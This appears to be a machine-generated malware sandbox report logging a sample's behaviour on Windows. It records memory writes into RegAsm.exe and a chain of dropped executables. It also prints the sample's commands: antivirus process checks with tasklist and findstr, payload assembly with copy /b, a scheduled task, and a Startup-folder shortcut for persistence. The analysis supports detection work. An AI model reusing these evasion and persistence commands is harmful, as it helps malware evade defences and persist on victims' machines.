                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28B74
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28BD8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28C3C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28CA0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28D04
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28D68
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28DCC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28E30
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28E94
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28EF8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28F5C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28FC0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29024
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29088
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A290EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29150
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A291B4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29218
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2927C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A292E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29344
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A293A8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2940C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29470
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A294D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29538
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2959C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29600
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29664
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A296C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2972C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29790
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A297F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29858
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A298BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29920
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29984
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A299E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29A4C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29AB0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29B14
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29B78
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29BDC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29C40
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29CA4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29D08
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29D6C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29DD0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29E34
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29E98
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29EFC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29F60
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29FC4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A028
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A08C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A0F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A154
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A1B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A21C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A280
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A2E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A348
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A3AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A410
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A474
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A4D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A53C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A5A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A604
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A668
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A6CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A730
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A794
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A7F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A85C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A8C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A924
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A988
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A9EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AA50
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AAB4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AB18
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AB7C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2ABE0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AC44
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2ACA8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AD0C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AD70
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2ADD4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AE38
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AE9C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AF00
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AF64
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AFC8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B02C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B090
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B0F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B158
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B1BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B220
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B284
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B2E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B34C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B3B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B414
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B478
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B4DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B540
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B5A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B608
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B66C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B6D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B734
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B798
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B7FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B860
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B8C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B928
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B98C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2B9F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BA54
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BAB8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BB1C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BB80
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BBE4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BC48
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BCAC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BD10
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BD74
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BDD8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BE3C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BEA0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BF04
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BF68
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2BFCC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2C030
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2C094
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2C0F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2C15C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2C1C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2C224
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2C288
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.comJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: unknown unknown
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub m
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub m
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00FA17EE
